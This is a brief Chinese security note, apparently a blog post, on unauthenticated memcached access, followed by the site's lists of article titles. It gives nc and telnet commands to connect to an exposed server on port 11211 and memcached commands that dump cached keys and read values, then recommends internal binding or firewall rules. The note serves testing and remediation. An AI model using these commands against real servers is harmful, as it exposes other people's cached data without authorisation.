memcached未授权

漏洞成因：

Memcached端口是对外开放的，用nc或Telne可以直接登录，查看信息，增加修改都可以。

nc -vv 1.2.3.4 11211

telnet 1.2.3.4 11211

验证读取key：

stats

stats items

stats cachedump 22 0

get kkkkkkkkkkkk

修复建议：

memcached设置监听内网或配置防火墙限制非必要的远程访问

最新文章

1. NotePad++中JSLint的使用
2. read properties
3. .NET陷阱之六：从枚举值持久化带来大量空间消耗谈起
4. RequireJS 模块的定义与加载
5. codevs1228 苹果树
6. [转]Android中Xposed框架篇—利用Xposed框架实现拦截系统方法
7. C#通过反射获取上层调用方法信息
8. Java编程思想学习(十一) 泛型
9. ATS连接 https
10. 【leetcode❤python】27. Remove Element
11. heredoc和nowdoc的区别
12. 【Linux】设定一个能输入中文的英文环境！
13. MFC之RTTI与动态创建
14. OVS 总体架构、源码结构及数据流程全面解析
15. [TJOI2017]可乐
16. Bagging之随机森林
17. 基于Servlet的MVC模式用户登录实例
18. django中如何实现分页功能
19. 使用 vmstat, mpstat 和 sar 查看系统运行参数
20. PAT甲级1055 The World's Richest【排序】

热门文章

1. eclipse设置成保护眼的背景色
2. 测试单元测试完毕关闭jvm
3. npm WARN checkPermissions Missing write access to 解决办法
4. 100行代码实现现代版Router
5. python内置函数每日一学 -- all()
6. cf711D. Directed Roads(环)
7. 关于初步搭建完成SSH环境之后，JUnit test 测试成功，页面测试时：@Resource 注入的dao为null
8. jQuery同步Ajax带来的UI线程阻塞问题
9. web测试实践
10. WordCount系统分析与设计作业